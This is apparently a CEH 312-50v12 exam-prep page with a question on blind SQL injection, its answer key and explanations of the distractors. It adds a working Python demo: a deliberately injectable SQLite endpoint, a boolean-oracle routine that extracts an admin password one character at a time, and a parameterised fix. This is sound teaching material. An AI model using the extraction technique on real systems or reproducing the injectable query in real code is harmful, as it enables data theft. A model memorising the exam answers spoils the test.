312-50V12 Question #133: Real Exam Question with Answer & Explanation
The correct answer is D: Blind SQL injection.
Question
This type of injection attack does not show any error message. It is difficult to exploit as it returns information when the application is given SQL payloads that elicit a true or false response from the server. By observing the response, an attacker can extract sensitive information. What type of attack is this?
Options
- A. Time-based SQL injection
- B. Union SQL injection
- C. Error-based SQL injection
- D. Blind SQL injection
Explanation
Blind SQL injection is the correct answer because the application displays no error message and returns no query output to the attacker. Instead, the attacker sends payloads that make the injected condition evaluate to either true or false, and infers data from the difference in how the application responds (for example, a "record found" page versus a "not found" page). This is the boolean-based variant of blind SQL injection: each request answers one yes/no question about the data, so extraction is slow but still fully possible.
Why the distractors are wrong:
- A (Time-based SQL injection) is a subtype of blind SQL injection, but it infers data from measurable response delays (e.g., payloads that call SLEEP() or an equivalent function) rather than from true/false responses, so it is more specific than what the question describes.
- B (Union SQL injection) appends a UNION SELECT to the original query so that the attacker's chosen data is returned directly in the application's normal output; nothing has to be inferred from the response.
- C (Error-based SQL injection) is essentially the opposite: it deliberately triggers database error messages and reads the extracted data out of them, which the question explicitly rules out.
Memory Tip: Think of "blind" literally - the attacker is blindfolded and cannot see errors or direct output, so they must play a yes/no guessing game with the database to piece together sensitive information, like solving a puzzle one bit at a time.
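To make the "one bit at a time" idea concrete, here is an added worked example that is not part of the original question or explanation. It stands up a constructed in-memory SQLite database with a hypothetical product-lookup endpoint that only ever answers "found" or "not found" (errors are swallowed, so the attacker never sees a message), then drives a boolean-based blind extraction of the admin password through that endpoint using a binary search over each character's code point. A parameterised version of the same endpoint is shown alongside it to demonstrate the fix. The table and column names, the secret value, and the endpoint functions are all assumptions made for the example.

```python
import sqlite3

# Constructed sample data: the value the attacker will recover without ever seeing it.
SECRET = "s3cr3t"


def make_db() -> sqlite3.Connection:
    """Build a constructed in-memory database standing in for the target backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET,))
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", [(1, "widget"), (2, "gadget")])
    conn.commit()
    return conn


def vulnerable_product_exists(conn: sqlite3.Connection, product_id: str) -> bool:
    """Hypothetical vulnerable endpoint: True means a 'found' page, False a 'not found' page.

    The id is concatenated straight into the SQL, which is the injection point.
    Database errors are caught and mapped to 'not found', so the attacker gets
    no error message and no query output, only a true/false signal.
    """
    query = f"SELECT name FROM products WHERE id = {product_id}"
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error:
        return False
    return row is not None


def safe_product_exists(conn: sqlite3.Connection, product_id: str) -> bool:
    """Hardened version: validate the type and bind the value as a parameter."""
    try:
        pid = int(product_id)
    except ValueError:
        return False
    row = conn.execute("SELECT name FROM products WHERE id = ?", (pid,)).fetchone()
    return row is not None


def oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean oracle: the page says 'found' if and only if `condition` is true.

    Product 1 exists, so `1 AND (<condition>)` reduces the whole WHERE clause
    to the truth value of the injected condition.
    """
    return vulnerable_product_exists(conn, f"1 AND ({condition})")


def extract_password(conn: sqlite3.Connection, username: str = "admin", max_len: int = 32) -> str:
    """Recover users.password for `username` one character at a time via the oracle."""
    subq = f"(SELECT password FROM users WHERE username='{username}')"

    # Step 1: learn the length with one yes/no question per candidate length.
    length = 0
    for n in range(max_len + 1):
        if oracle(conn, f"length({subq}) = {n}"):
            length = n
            break

    # Step 2: for each position, binary-search the printable ASCII range (32..126).
    # unicode() is SQLite's code-point function; each character costs at most 7 queries.
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr({subq}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = make_db()
    # A syntactically broken payload still only yields 'not found': no error is leaked.
    print("broken payload ->", vulnerable_product_exists(db, "1 AND (SELECT x FROM nope)"))
    print("recovered:", extract_password(db))
    print("safe endpoint with payload ->", safe_product_exists(db, "1 AND (1=1)"))
```

The point to notice is that every request is answered with the same two pages a legitimate user would see; the only thing the attacker controls is which question the page answers. Binary search keeps the cost to about seven requests per character, which is why boolean-based blind extraction is slow but entirely practical and why `safe_product_exists` refuses anything that is not an integer before the value reaches the query.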